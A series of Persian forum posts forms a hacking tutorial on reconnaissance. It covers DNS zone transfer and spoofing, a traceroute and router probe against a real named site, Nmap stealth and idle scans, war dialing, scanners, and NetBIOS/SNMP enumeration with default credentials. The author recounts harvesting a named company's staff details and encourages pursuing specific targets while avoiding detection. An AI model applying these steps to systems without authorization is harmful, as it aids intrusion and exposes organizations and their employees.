يكي از مشكلات قديمي كه فكر ميكنم در حال حاضر فقط بايد در حد اطلاعات عمومي باهاش آشنا باشيم ، Zone Transfer هست . داستان اين Zone Transfer هم اين هست كه همه جا ، به خاطر اهميت سرويس DNS ، از حداقل دو تا DNS استفاده ميشه كه اولي master يا primary هست و وظيفه ترجمه آدرس ها رو داره ، و دومي slave يا secondary هست و وظيفه كمكي رو داره . حالا طبق اصول مديريتي شبكه ، اطلاعاتي كه در DNS اولي هست ، بايد طبق يك برنامه زمان بندي شده ، يا درخواست مستقيم DNS دومي ، به DNS دوم هم منتقل بشه كه اين DNS هم اطلاعاتش به روز باشه . حالا اگر تنظيمات در سرور DNS اول طوري باشه ، كه اين اطلاعات درخواستي رو براي هر سيستمي كه درخواست كرد ، بفرسته ، مشكل Zone Transfer داره ، و اگر يك همچين سروري پيدا بشه ، هكر ميتونه تمام اطلاعات ركورد شده روي اون DNS رو كه شامل آدرس هاي خصوصي اون شبكه هم ميشه رو بدست بياره و به اين شكل اطلاعات كاملي از شبكه ي هدف به چنگ بياره . براي جلوگيري از اين حالت بايد سرور اصلي رو به گونه اي تنظيم كرد كه فقط اطلاعات رو براي آدرس سرور دوم بفرسته و به درخواست هاي ديگه پاسخ نده . جهت اطلاع هم بايد بگم كه دو نوع Zone Transfer‌ داريم . يكي Full يا AXFR كه تمامي اطلاعات ارسال ميشه و ديگري هم Incremental يا IXFR كه آخرين تغييرات بعد از آخرين ارسال ، ارسال ميشه .

يكي ديگه از مشكلات ساختاري DNS ها ، كه نسبت به قبلي متداول تر هست ، DNS Spoofing هست . در اين حالت ، درخواست كننده به جاي اينكه به آدرس صحيح ارجاع داده بشه ، به يك آدرس غلط فرستاده ميشه . اين نوع حملات به چند روش قابل اجرا هست . همونطور كه در بالا اشاره كرديم ، در مسير سلسله مراتبي ، تعدادي DNS ممكنه وجود داشته باشه كه كارشون cache كردن هست . اگر يك هكر بتونه اطلاعات غلطي رو به جاي اطلاعات صحيح وارد cache اين سرورها بكنه ، ميتونه درخواستهاي بعدي براي يك سايت خاص رو كه از اون DNS ميگذرند رو به يك آدرس ديگه منحرف كنه . اين حملات به DNS Cache Poisoning معروف هستند.
حالت ديگه ميتونه اين باشه كه هكر يك جايي بين درخواست كننده و سرور DNS قرار بگيره و به ترافيك گوش بده ، و هر وقت متوجه درخواستي شد ، قبل از اينكه DNS به اون درخواست جواب بده ، جواب غلط رو براي درخواست كننده بفرسته و اون رو به آدرس ديگه اي ارجاع بده . به اين حالت Spoofing DNS Response ميگند .
حالت سوم ميتونه اين باشه كه هكر كنترل يك DNS رو در دست بگيره و ... . به اين حالت DNS Server Compromise ميگند .

خب ، به نظر ميرسه كه مباحث مربوط به DNS تموم شده باشه . اما اينطور نيست. جالب ترين بخش داستان DNS ها ، استفاده از اونها در حملات SQL Injection هست . حتماً مي پرسيد كه DNS چه ربطي به SQL Injection داره ؟
موضوع اينجاست كه MS SQL و Oracle يك سري توابع و پروسيجر دارند كه ميتونند مستقيم يا غير مستقيم با DNS ها كار كنند و اطلاعات بگيرند . بعضي از اين دستورات و توابع با كاربر public هم قابل اجرا هستند و به بعضي از اونها هيچ اشاره اي در راهنما هاي hardening در ايمن سازي بانكهاي اطلاعاتي نشده . چون اين روش خيلي پيچيدگي داره ، من اون رو در بخش " حملات تحت وب " و SQL Injection بررسي ميكنم ، اما علاقمندان ميتونند به ارائه ي آقاي "پاتريك كارل سن" در كنفرانس Defcon 15 ، تحت عنوان SQL Injection & OOB Channels مراجعه كنند .

در درس بعدی , مراحل بعدی جمع آوری اطلاعات رو ادامه میدیم .

pastoo
25-12-2007, 22:12
بنام خدا

در ادامه ي مبحث جمع آوري اطلاعات ، به مراحلي ميرسيم كه بايد براي بدست آوردن اطلاعات ، بايد با سيستم هدف درگير بشيم . در مراحل قبلي ، فعاليت هاي ما ، تعاملي با سيستم هدف نداشت و حساسيتي هم روي اون وجود نداشت . اين جور شناسايي ها رو اصطلاحاً passive ميگند . اما از اينجا به بعد ، فعاليتهاي ما active ميشه . بنابرين از اين مرحله به بعد ، هميشه امكان اينكه ما شناسايي يا ره گيري بشيم و يا اينكه هدف متوجه بشه كه تحت حمله يا تهديد هست ، وجود داره .
همونطور كه در مقالات قبلي اشاره شد ، شناسايي و جمع آوري اطلاعات در مورد هدف، شامل 7 مرحله ميشه كه مرحله ي اول رو بررسي كرديم . 6 مرحله ي بعد به طور كل در مورد تكنيكها ، روشها ، انواع و ابزارهاي اسكن يا پويش بحث ميكنه و ما هم هدفمون اينه كه در مبحث اسكن كردن ، كه خيلي هم مهم هست ،‌ بيشتر صحبت كنيم و تا اونجا كه ممكن هست ، اين بحث رو كاربردي پيش ببريم .
ابتدا يك نگاه سريع به 6 مرحله ، از نظر آكاداميك ميكنيم :

1 – پيدا كردن آدرسهاي شبكه با استفاده از trace كردن
2 – پيدا كردن سيستم هاي فعال با استفاده از ping كردن
3 – پيدا كردن پورت هاي باز يا نقاط دسترسي روي سيستم هدف با استفاده از پورت اسكنرها يا اسكنرهاي مودم
4 – پيدا كردن سيستم عامل هدف
5 – پيدا كردن سرويسهاي فعال بر روي پورتهاي باز و نقاط ضعف امنيتي اين سرويسها با استفاده از اسكنر باگهاي امنيتي
6 – طراحي يك نقشه نفوذ بر اساس آناليز اطلاعات بدست اومده در كليه مراحل قبل

مراحل بالا ، مراحلي هستند كه يك هك واقعي كه ميخواد از راه دور اجرا بشه ، به اونها نياز داره . اما نحوه ي اجرا در حالت واقعي ، هميشه به اين شكل نيست . اجرا تا حد زيادي به مهارت و تجربه ي هكر بستگي داره . به طور مثال ، در هك از طريق مشكلات امنيتي برنامه هاي كاربردي تحت وب ، ممكنه يك هكر با ديدن يك وب سايت ، متوجه برنامه كاربردي سازنده محتواي اون وب سايت بشه و نقاط ضعف اون رو بدونه و يك راست بره سراغ اكسپلويت كردن اون سايت . و اين خيلي خوبه ، چون بيخود شلوغ بازي نميشه .
اما توضيح مراحل به صورت كاربردي تر . در مرحله ي اول اين بخش ، استفاده از trace‌ عنوان شده . trace‌ كردن بيشتر براي پيدا كردن دروازه ي ورودي يك شبكه كاربرد داره . البته ميدونيم كه trace و ping هر دو از پروتكل icmp استفاده ميكنند و خيلي از سازمانها، اين پروتكل رو ********** ميكنند . اما اگر اين كار هم انجام داده باشند ، حداقل ميفهميم كه يك ابزار ********** كننده مثل روتر يا فايروال در مسير ما وجود داره . يك مثال از trace رو در زير مي بينيم :



C:\>tracert 208.69.56.184

Tracing route to www.imenafza.net [208.69.56.184]
over a maximum of 30 hops:

1 <1 ms <1 ms <1 ms mygateway1.ar7 [192.168.1.1]
2 732 ms 648 ms 550 ms vpdn-router.core-local.shahrad.net [81.12.75.7]

3 798 ms 798 ms 798 ms core-2851.shahrad.net [81.12.75.1]
4 889 ms 748 ms 847 ms 192.168.26.1
5 1000 ms * 809 ms fe1-1.marco.sr.noc.tehran.sinet.ir [62.220.99.21
]
6 860 ms 748 ms 553 ms fe1-0.marco.bb.noc.tehran.sinet.ir [62.220.101.1
81]
7 709 ms 698 ms 904 ms fe0-1.orion.bb.noc.tehran.sinet.ir [62.220.100.1
]
8 899 ms * 806 ms vlan101.lct5.bb.lct.i.tehran.sinet.ir [62.220.96
.114]
9 853 ms 804 ms * pos4-12.ar03.ldn01.pccwbtn.net [63.218.52.33]
10 * 806 ms 798 ms pos12-2.br02.ldn01.pccwbtn.net [63.218.12.234]
11 992 ms 1195 ms 1096 ms vl236.mpd01.lon01.atlas.cogentco.com [130.117.0.
13]
12 1199 ms * 1124 ms te7-3.mpd02.lon01.atlas.cogentco.com [130.117.2.
26]
13 1149 ms 1051 ms 1250 ms te3-2.mpd01.bos01.atlas.cogentco.com [130.117.0.
185]
14 904 ms 802 ms * te3-4.mpd01.yyz01.atlas.cogentco.com [154.54.5.1
18]
15 * 1076 ms 1096 ms vl3492.mpd01.yyz02.atlas.cogentco.com [154.54.5.
82]
16 1094 ms 1046 ms 1000 ms voicom-inc.demarc.cogentco.com [38.104.158.26]
17 1048 ms 854 ms 649 ms cirrustech-gw.iptransit.ca [208.69.240.86]
18 * * * Request timed out.
19 * * * Request timed out.
20 * * * Request timed out.
21 * * * Request timed out.
22 * ^C
C:\>





خب ، اطلاعاتي كه براي ما مهم هست ، از خط 17 به بعد هست . همونطور كه متوجه شديد ، هدف ما 208.69.56.184 بود . خط 17 اشاره به يك ماشين به آدرس 208.69.240.86 ميكنه ، كه با توجه به آدرسها ، ميشه حدس زد كه اين بايد gateway هدف ما باشه . بعد از خط 17 هم trace ما ********** شده ، كه نشون ميده يك ماشين ********** كننده جلوي هدف ما وجود داره . براي اطمينان بيشتر به آدرس 208.69.240.86 با telnet وصل ميشيم . از ما كلمه ي عبور ميخواد ، پس به احتمال خيلي خيلي زياد ، اين يك روتر هست . اما هيچ بنري وجود نداره كه دقيقاً مطمئن شيم . اگر دروس مربوط به ايمن سازي روترهاي سيسكو رو مطالعه كرده باشيد ، گفتيم كه خيلي از ادمين ها ، براي راحتي مديريت روتر ، سرويس http رو فعال ميكنند . بنابرين ما در برازر خودمون وارد ميكنيم http://208.69.240.86 (http://208.69.240.86/) و شكل زير رو مي بينيم .



http://www.imenafza.net/pics/gate.JPG


خب ، با يك جستجوي ساده در اينترنت متوجه ميشيم كه اين ماشين يك روتر سيسكو هست كه سرويس sdm يا security device manager (http://www.cisco.com/go/sdm)روي اون نصب شده . اين سرويس در حالت پيش فرض از نام كاربري و كلمه ي عبور cisco استفاده ميكنه . كه البته در اين مورد تغيير داده شده .

در مورد ping هم چيز زيادي وجود نداره . چون icmp بر اساس پيغام ها كار ميكنه ، در حالتهاي مختلف ، پيغام هاي مختلفي ايجاد ميشه كه معاني متفاوتي داره . در مثال بالا پيغام request time out به معني اينه كه درخواست ما به هدف نرسيده و جوابي براش نيامومده كه میتونه معنی فیلتر شدن یا خاموش بودن سیستم هدف رو بده كه با توجه به up بودن هدف , معنی اول بدست میاد .

در مقالات بعدی این مبحث رو ادامه میدیم .

pastoo
06-01-2008, 21:57
بنام خدا

در ادامه مبحث شناسايي هدف ، ميرسيم به بخش اسكن كردن سيستم هدف براي پيدا كردن پورتهاي باز و برنامه هاي در حال اجرا و پيدا كردن نقاط دسترسي راه دور .

همونطور كه قبلاً هم اشاره شد ، هنگام اسكن كردن ، اگر اينكار رو بي ملاحظه انجام بديم ، خيلي راحت حمله ي ما شناسايي ميشه . ممكنه كه در كشور ما ، اين نكته خيلي مهم نباشه ، اما وقتي شما بدون در نظر گرفتن مخفي بودن شروع به اسكن كردن يك سيستم متعلق به يك سازمان ميكنيد ، آدرس IP شما ، در سيستم هدف ثبت ميشه . بعد اون سازمان بلافاصله ISP كه شما از اون استفاده كرديد رو رد گيري ميكنه و براي اون ISP اخطار ميفرسته كه مثلاً يكي از كاربرهاي شما در فلان روز و فلان ساعت با آدرس IP فلان ، با استفاده از نرم افزار .... به سيستم هاي ما حمله كرده و ... . حالا ما چون در ايران هستيم و تابع قانون جهاني در اين مورد نيستيم ، اين اخطارها از طرف ISP پيگيري نميشه و بدست ما نميرسه . چون اين مسئله در خارج از ايران و در ديد كلي خيلي مهم هست ، تكنيكهاي متنوعي براي مخفي بودن مرحله اسكن كردن پورتها ابداع شده كه در ادامه قصد داريم اين تكنيك ها رو كه در نرم افزار Nmap ارائه شده ، بررسي كنيم .
وقتي اينترفيس Nmap رو نگاه ميكنيم ، بخش Scan Type‌ جلب توجه ميكنه . اين بخش كه يك ليست انتخاب باز شو ، هست ، شامل گزينه هايي ميشه كه تكنيك اسكن پورت رو بر اساس قابليت هاي مختلف پروتكل tcp/ip و سرويس هاي اينترنتي، مشخص ميكنه . در ادامه قصد دارم كه اين تكنيكها رو به اختصار توضيح بدم .

SYN Stealth Scan

در اين تكنيك ، كه يك تكنيك مخفي هست ، ارتباط كامل با سيستم هدف بر قرار نميشه . يعني مراحل 3 Way Handshake‌ به طور كامل اجرا نميشه . در اين روش ابتدا نرم افزار اسكنر ما ، يك بسته براي سيستم هدف با پورت مورد نظر كه فلگ SYN‌ اون ست شده ( يا يك شده ) رو براي هدف ميفرسته . اگر پورت مورد نظر باز باشه ، سيستم هدف اين ارتباط رو ميپذيره و يك بسته ي پاسخ با فلگهاي SYN و ACK‌ ست شده براي ما ميفرسته . تا اينجا نصف كار انجام شده . در حالت برقراري ارتباط واقعي، بايد در جواب اين بسته ، ما هم يك بسته يا فلگ ACK ست شده براي هدف ارسال كنيم ، اما در اين حالت ، ما فهميديم كه پورت باز هست ، بنابرين احتياجي به ادامه مراحل نيست و نرم افزار به جاي ارسال بسته ي ACK ، يك بسته با فلگ RST‌ يا reset ميفرسته و ارتباط رو ميبنده . در اين روش ، چون ارتباط ما با سيستم هدف كامل نشده ، چيزي در سيستم هدف ثبت نميشه . سرعت اسكن هم بيشتر ميشه، اما به علت كامل نبودن برقراري ارتباط ، اطلاعات بيشتري نميتونيم از سيستم هدف بدست بياريم . در اين حالت اگر پورت مورد نظر ما بسته باشه ، سيستم هدف در جواب بسته SYN ما ، يك بسته ي ACK‌ و RST ارسال ميكنه كه بدون جواب ميمونه و از نظر ما اون پورت بسته و ادامه ي ارتباط بي معني هست .

Connect Scan

اين تكنيك ، در حقيقت همون اسكن با 3 way handshake‌ هست . ارتباط با هدف به صورت كامل بر قرار ميشه . آدرس IP ما ثبت ميشه ، اما اطلاعات كاملي از هدف بدست مياد .

ACK Scan

در اين تكنيك ، اولين بسته ي ارسالي از طرف ما ، با فلگ ACK ست شده مي باشد و جواب در صورت باز بودن يا بسته بودن پورت مورد نظر ، يك بسته با فلگ RST خواهد بود ! پس هدف از اين تكنيك ، باز بودن يا بسته بودن پورت مورد نظر نيست . اين تكنيك براي شناسايي تنظيمات فايروال يا سيستم هاي ********** كننده به كار برده ميشه. بنابرين اگر بسته ي ارسالي ما به هدف برسه و پاسخ RST دريافت بشه ، نتيجه اينه كه پورت مورد نظر ********** نشده و Nmap اون رو به صورت unfiltered نشون ميده . ولي اگر جواب RST نرسه و به جاي اون يك جواب ICMP بياد ، نتيجه ميشه كه اون پورت ********** شده و nmap اون رو به صورت filtered نشون ميده .

TCP Window Scan

دقيقاً سناريوي ACK Scan پياده سازي ميشه ، با اين تفاوت كه nmap به window size بسته ي پاسخ نگاه ميكنه . در بعضي از سيستم ها ، بسته ي پاسخ RST شامل يك مقدار مثبت براي Window Size براي پورتهاي باز هست ، در حالي كه در پورتهاي بسته ، اين مقدار صفر هست .


FIN/ACK ، FIN‌ ، NULL ، Xmas Stealth Scans

تمامي اين تكنيكها شبيه هم هستند ، فقط موضوع بازي كردن با فلگ ها هست . ارسال يك بسته براي درخواست برقراري ارتباط روي يك پورت خاص در حالي كه فلگ اون اشتباه ست شده باشه ، باعث ايجاد دو حالت متفاوت ميشه . اگر پورت مورد نظر بسته باشه ، اون درخواست با يك بسته ي RST جواب داده ميشه و اگر پورت باز باشه ، هيچ جوابي ارسال نميشه . در تكنيكهاي بالا ، NULL به معني بسته اي هست كه هيچ فلگی در اون ست نشده باشه و Xmas هم بسته اي هست كه همه ي فلگهاي اون با هم ست شده باشه . تمام اين تكنيكها مثل SYN Scan مخفي هستند و همون مزايا و معايب رو دارند .

UDP Scan

نياز به توضيح نداره .

IP Protocol

براي تشخيص نوع IP protocol مورد پشتيباني توسط هدف مثل ICMP , TCP ,IGMP و ... استفاده ميشه .

Ping Sweep

احتياج به توضيح نداره .

Host List

احتياج به توضيح نداره .


FTP Bounce

در اين روش از يك Server FTP كه اجازه ي login كردن با كاربر anonymous رو بده و يك دايركتوري با قابليت خواندن و نوشتن رو براي اين كاربر داشته باشه و بشه با اون يك فايل براي يك ماشين ديگه ارسال كرد ، استفاده ميشه . اگرچه ديگه شايد چنين FTP Server ي پيدا نشه ، اما شيوه ي كار اينجوريه كه nmap بعد از مشخص كردن آدرس اين ftp server ، از اون ميخواد كه يك فايل براي سيستم هدف روي پورت خاص ارسال كنه ، اگر ftp server تونست روي اون پورت مورد نظر با سيستم هدف ارتباط بر قرار كنه ، nmap ميفهمه كه اون پورت روي سيستم هدف باز هست و در غير اين صورت ، پورت بسته هست .


Idle

در اين روش هم كه يكي از مخفي ترين تكنيكهاي اسكن هست ، بايد از يك سيستم واسط استفاده كرد كه اصطلاحاً به اونها Zombie گفته ميشه . شيوه ي كار به اين شكل هست كه هر بسته ي IP ، يك شماره منحصر به فرد داره كه به اون IPID ميگن . سيستم عاملها ( بعضي نسخه ها ) ، در هر ارسال بسته ، اين مقدار رو افزايش مي دادند . حالا اين ايده وجود داره كه اگر مهاجم بتونه يك Zombie پيدا كنه و بتونه شماره هاي IPID‌ اون رو بخوونه و تحت نظر داشته باشه ، ميتونه بفهمه كه چند تا بسته در يك فاصله مشخص از سيستم zombie ارسال شده . حالا با اين توضيح فرض ميكنيم كه ipid سيستم zombie مثلاً 32852 هست . مهاجم يك بسته ي SYN‌ براي سيستم هدف روي پورت خاص با آدرس مبداء zombie ارسال ميكنه ( يك نوع spoof ) . اگر پورت مورد نظر روي سيستم هدف باز باشه ، سيستم هدف يك بسته ي ACK , SYN براي zombie ميفرسته . چون zombie هيچ سابقه اي از اين ارتباط نداره ، اون رو reset ميكه و IPID سيستم zombie‌ افزايش پيدا ميكنه . حالا اگر پورت سيستم هدف بسته باشه ، يك بسته ي RST براي zombie ميفرسته و zombie هم جوابي نميده و IPID‌ اون تغييري نميكنه . مهاجم هم كه شماره IPID هاي zombie رو تحت نظارت داره ، ميفهمه كه پورت رو سيستم هدف باز بوده يا بسته .

pastoo
15-01-2008, 09:10
در ادامه ي مبحث ، مي پردازيم به انواع ديگه ي اسكن كردن . يكي ديگه از جاهايي كه در كتابها به اون اشاره ميشه ، اسكن كردن نقاط دسترسي هست . نقاط دسترسي يعني نقاطي كه ما ميتونيم خارج از مسير معمولي ، از طريق اونها وارد سيستم يا شبكه هدف بشيم . اين نقاط در زمان قديم ، مودم هايي بودن كه به يك خط تلفن متصل و منتظر تماس از خارج و برقراري ارتباط هستند . نفوذ از طريق اين مودمها رو اصطلاحاً War Dialling ميگند . اگرچه اين كار يك راه كار قديمي براي مديريت راه دور هست ، اما ممكنه در حال حاضر هم از اون استفاده بشه . علت اينكه ديگه از اين روش براي مديريت راه دور استفاده نميشه اينه كه تكنولوژي هاي جديدتر مثل VPN جايگزين اون شده و همينطور نرم افزارهاي مديريت از راه دور پيشرفته كه امكان مديريت راحت و منعطف رو از طريق اينترنت فراهم ميكنه . اما با اين وجود ، هنوز ابزارهايي مثل سوييچ ، روتر و فايروال ، يك پورت براي اتصال به مودم و خط تلفن دارند . مديران شبكه ي با تجربه ، اين كار رو انجام ميدن كه هر وقت امكان مديريت ابزار مورد نظر از طريق شبكه امكان نداشت و دسترسي فيزيكي هم موجود نبود ، از اين راه ابزار مورد نظر رو مديريت كنند . اين اتفاق مخصوصاً موقع به روز رساني سيستم عامل ابزار ، هنگامي كه سيستم عامل جديد درست نصب نميشه و مشكلي پيش مياد ، و شخصي هم كه ميتونه مشكل رو رفع كنه در سازمان نيست ، خيلي كاربرد داره . يعني تنها راه برگشت به حالت نرمال هست . اين موضوع ميتونه مورد سو استفاده هكرها هم قرار بگيره . براي اينكار احتياج به دونستن شماره تلفني هست كه به مودم وصل هست. اين شماره رو ميشه از راه هايي كه در قسمت هاي قبلي به اون اشاره شد ، بدست آورد . نرم افزارهايي هم هستند كه براي اسكن كردن يك رنج از شماره تلفن ها , مورد استفاده قرار مي گيرند . معروفترين اين نرم افزارها THC-Scan هست كه البته من فكر ميكنم به همون علت كه در بالا اشاره شد ، اين نرم افزار ديگه رشد نكرد و نسخه ي موجود همون نسخه ي قديمي هست كه اينترفيس جالبي نداره . نرم افزار ديگه اي هم در اين زمينه وجود داره به اسم PhoneSweep كه يك نرم افزار تجاري هست .

اما مهمترين بخش در اسكن كردن سيستم ها ، اسكن كردن براي پيدا كردن حفره هاي امنيتي هست . نرم افزارهاي زيادي براي اين كار وجود داره كه هر كدوم ويژگيهاي خاص خودشون رو دارند . اين نرم افزار ها اكثراً ، پورتها رو هم اسكن ميكنند. اين بخش به اندازه اي مهم هست كه خيلي ها براي شروع هك ، مستقيماً وارد اين قسمت ميشن و كاري به بخش هاي ديگه ندارند . اگر سيستمي رو پيدا كردند كه داراي باگ هست ، اون رو هك ميكنند و در غير اين صورت هم ، دست خالي بر مي گردند . اما اگر شما مصمم به هك كردن يك سيستم خاص هستيد ، بايد همه ي مراحل رو مد نظر داشته باشيد . بنابرين توصيه مي كنم كه اگر روي يك سيستم باگي پيدا نكرديد ، از اسكن كردن پورتها نا اميد نشيد . مورد هايي بوده كه سيستم هدف خيلي ايمن بوده ، اما با اسكن كردن تمام پورتهاي tcp و udp روي اون ، متوجه نصب نرم افزار هاي مديريت راه دور شديم كه از طريق اونها تونستيم به سيستم نفوذ كنيم . روي سرور ها معمولاً از اينجور نرم افزارها نصب ميشه ، فقط بايد كمي حوصله داشته باشيد و مصمم براي انجام كار .

همونطور كه اشاره شد ، نرم افزار هاي زيادي براي اسكن كردن سيستم ها در سطح سيستم عامل و سرويس ها وجود داره كه مقالات زيادي در سايت هاي مختلف به زبان فارسي در مورد اونها وجود داره و قصد نداريم كه تكرار مكررات كنيم . استفاده از اين نرم افزار ها هم تا يه حدي سليقه اي هست و هر شخصي با يك نرم افزار راحت هست . من شخصاً Nessus‌ تحت لينوكس رو مي پسندم . اما اين نرم افزار ها ، تابع ماتريكس 2 در 2 هستند و هميشه امكان اينكه نتيجه ي نشون داده شده اشتباه باشه ، وجود داره . مسئله ي به روز بودن نرم افزار هم خيلي مهم هست و اين كه بشه يك اسكنر رو با آخرين باگهاي كشف شده به روز كرد ، اهميت فوق العاده ي داره . خيلي وقتها هم قضيه ي هك كردن سيستم هدف ، حالت معكوس ميگيره . يعني هكر ، اول در مورد سيستم هدفش اطلاعات بدست مياره ، و بعد اينترنت رو براي پيدا كردن آخرين باگها و اكسپلويت هاي منتشر شده مربوط به اون نسخه ي خاص از سرويس يا سيستم عامل ، جستجو ميكنه . اين روش مخصوصاً براي هك كردن از طريق برنامه هاي كاربردي تحت وب ، خيلي كاربردي هست .

غير از اسكنرهاي مربوط به كشف باگ در سيستم عامل و سرويس هاي اون ، اسكنرهايي هم هستند كه باگ هاي امنيتي در برنامه هاي تحت وب رو پيدا مي كنند. يكي از نرم افزار هاي خوب در اين زمينه Acunetix هست كه البته يك نرم افزار تجاري هست كه امكان خريد لايسنس اون از طريق شركت آواژنگ در ايران ميسر هست .( قيمتهاي خيلي بالايي داره )

اسكنرها از لحاظ روش و به كارگيري اصطلاحات ، مثل هم هستند . يعني اگر شخصي اصطلاحات و مفاهيم به كار برده شده در يك اسكنر رو به خوبي متوجه بشه، با هر اسكنر ديگه اي هم ميتونه به راحتي كار كنه . فقط اينترفيس ها هست كه با هم فرق ميكنه . نكته ي مهم در انجام يك اسكن خوب ، انتخاب صحيح ماژول هاي موجود در اسكنر هست . يعني اگر ميدونيم كه سيستم عامل هدف لينوكس هست، ماژول هاي مربوط به ويندوز رو انتخاب نكنيم . يا اگر متوجه شديم كه روي يك سرور ، سرويس ftp در حال اجرا هست ، ماژول هاي مناسب با اين سرويس رو انتخاب كنيم و سعي كنيم كه اسكن هاي ديمي و باري به هر جهت انجام نديم .

چون مطمئن هستم كه مطالب در اين زمينه به اندازه ي كافي در سايتهاي دوستان موجود هست ، بيشتر از اين روي اين موضوع مكث نمي كنم و از مقالات بعدي ، وارد مراحل بعد از اسكن كه كاربردي تر هست ميشيم . انشاالله .

pastoo
21-01-2008, 11:18
معمولاً در بعضي شرايط خاص ، يك مرحله به شناسايي هدف اضافه ميشه كه اصطلاحاً به اون Enumeration‌ ميگند ، كه من اسم پيشروي در جزييات رو روي اون گذاشتم . اگر هدف ما از سرويسهاي NetBios ، SNMP ، DNS‌ و SMB استفاده كنه ، شايد بشه اطلاعات بيشتري در مورد هدف بدست آورد . اين كه ميگم شايد به اين علت هست كه امروزه سيستم عامل و سرويسهاي اون ، اونقدر ايمن شدند كه ديگه نشه به اين راحتي اينجور تكنيكها رو روشون اجرا كرد . اما طبق اصول ، ما بايد با اين تكنيكها آشنا باشيم ، چون ممكنه جايي بدردمون بخوره .

اولين سرويسي كه در اين مرحله مطرح ميشه ، NetBIOS هست . اگر اين سرويس در روي سيستم هدف در حال اجرا و براي ما به صورت راه دور قابل دسترس باشه ( يعني در نتايج پورت اسكن ، پورتهاي 139 و 445 tcp براي SMB و 137 و 138 udp باز باشه ) مي تونيم اطلاعاتي از قبيل نام كاربري افرادي كه روي سيستم هدف داراي حساب كاربري هستند، نام گروه هاي كاربري و منابعي كه share‌ شدند رو بدست بياريم . من دقيقاً يادم هست كه 5- 6 سال پيش ، با استفاده از همين مسئله ، اسامي و نام كاربري و پست سازماني و گروه هاي كاربري حدود 50 الي 60 نفر از كارمند هاي شركت ذوب آهن اصفهان رو بدست آورده بوديم كه از مدير عامل تا مسئول حراست اين شركت داخل اين ليست بود . اگرچه فكر نمي كنم ديگه همچين هدف هايي پيدا بشه . اطلاعاتي كه از اين طريق بدست مياد ، معمولاً به طور مستقيم ما رو به دسترسي نميرسونه ، بلكه يك جور ديد و شناخت ما رو از هدف كاملتر ميكنه و امكان استفاده از اطلاعات در حملات ديگه رو بوجود مياره . همونطور كه ميدونيد NetBIOS بر روي سيستم هاي ويندوز قابل استفاده هست .

SNMP يا Simple Network Management Protocol‌ هم همونطور كه از اسمش پيداست، يك پروتكل مديريتي ساده هست كه براي مديريت راه دور سيستم ها و ابزارهاي شبكه بوجود اومده . نكته اي كه در مورد اين پروتكل وجود داره ، استفاده از يك string‌ هست كه بين ابزارهايي كه قصد دارند با استفاده از اين پروتكل با هم تبادل اطلاعات كنند ، رد و بدل ميشه . اين string كه اصطلاحاً به اون SNMP Community String ميگند ، در حالت مونيتور و خوندن اطلاعات ، به صورت پيش فرض رشته ي " public " و براي حالت نوشتن رشته ي “ private “ هست . بنابرين با استفاده از اين نقيصه ، ميشه اطلاعات خيلي جزيي در مورد سيستم پيكربندي سيستم هدف بدست آورد و حتي پيكربندي رو تغيير داد . SNMP رو پورت 161 udp در حالت listen قرار ميگيره و بيشتر روي ابزارهاي شبكه مثل روترها استفاده ميشه .

در مورد DNS Zone Transfer هم در مقالات قبل توضيح دادم .

نرم افزار هاي زيادي در مورد Enumeration وجود داره كه هر كدوم به يك بخش مي پردازه، اما بين اونها ، نرم افزار WinFingerprint (http://www.softpedia.com/get/Security/Security-Related/winfingerprint.shtml) تقريباً همه ي موارد رو در كنار هم جمع كرده . اينترفيس و كار كردن با اون خيلي ساده هست و احتياج به توضيح نداره .

اما قبل از شروع مرحله بعد در هك ، يك سري مقدمات رو بايد براي افرادي كه تازه ميخوان شروع كنند ، شرح بدم . اگر بخوايم مطالبي كه تا اينجا گفتيم رو جمع بندي كنيم، بايد اين رو بگيم كه ما بدنبال بدست آوردن اطالاعاتي بوديم كه از طريق اون اطلاعات ، روي سيستم هدف دسترسي پيدا كنيم و به قول معروف هكش كنيم . ما تمركز خودمون رو روي نفوذ به سيستم هدف ، از راه دور قرار دادیم . ولي اين تمام موضوع هك نيست . نفوذ از راه دور يكي از مقولات هك محسوب ميشه . كه البته در دنياي امنيت شبكه ، كمترين ريسك رو شامل ميشه . علتش هم اين هست كه خيلي از تهديدات راه دور ، با چند ترفند ساده قابل مهار هستند . چيزي كه امنيت شبكه خيلي از اون ميترسه ، وجود كاربران داخلي با دانش بالا یا بدون دانش و ناراصی هست كه ميتونند بيشترين تهديد رو براي شبكه بوجود بيارن . فرض كنيد كه يك كارمند در بخش Software Develop يك سازمان كه طبق نيازش ميتونه روي سيستمش نرم افزار نصب كنه ، يك sniffer نصب كنه و ... . اين چيزي هست كه امنيت شبكه خيلي از اون ميترسه و مباحث اصلي و حرفه اي امنيت ، اونجا معني پيدا مي كنند . اين موضوع رو مطرح كردم كه قبل از هر چيز بگم كه هك كردن فقط اسكن كردن ، پيدا كردن باگ ، اكسپلويت كردن سيستم و نفوذ به هدف از طريق اينترنت نيست و همه ي امنيت شبكه هم مقابله با اون نيست . اين تنها يك بخش كوچيك از اون چيزي هست كه همه به دنبال يادگيري اون هستيم .

خب ، با اين توضيح ما داريم از يك بحث ساده وارد دنياي هك ميشيم . يك سيستم رو اسكن كرديم و اسكنر ما ، مثلاً Nessus ، يك سري report به ما داده . حالا بايد چي كار كنيم ؟‌

گزارشي كه يك اسكنر به ما ميده ، معمولاً شامل سه نوع تقسيم بندي هست . اين سه دسته شامل
Security Hole , Security Warning و Security Note هستند . چيزي كه در مرحله ي اول براي ما مهم هست ، Security Hole ها هستند . اين حفره هاي امنيتي ، امكان نفوذ به سيستم رو براي ما فراهم مي كنند . هر باگي كه كشف و گزارش ميشه ، بعد از بررسي و تاييد ، دسته بندي ميشه و يك شماره منحصر به فرد ميگيره كه به اون BugtraqID يا BugID ميگند . كمترين چيزي كه يك اسكنر بايد گزارش بده ، BugID پبدا شده روي سيستم هدف هست . با استفاده از اين BugID ، ما ميتونيم اطلاعات دقيقتري نسبت به اون حفره امنيتي و راه هاي اكسپلويت كردن اون به دست بياريم . يكي از سايتهاي مرجع در اين زمينه ، سايت SecurityFocus.com هست .
ناگفته نمونه كه سایت bugtraq.ir هم یك مرجع خوب برای فارسی زبانها هست كه جای تقدیر و خسته نباشید برای گرداننده های اون رو داره و كمبود اون همیشه احساس میشد .
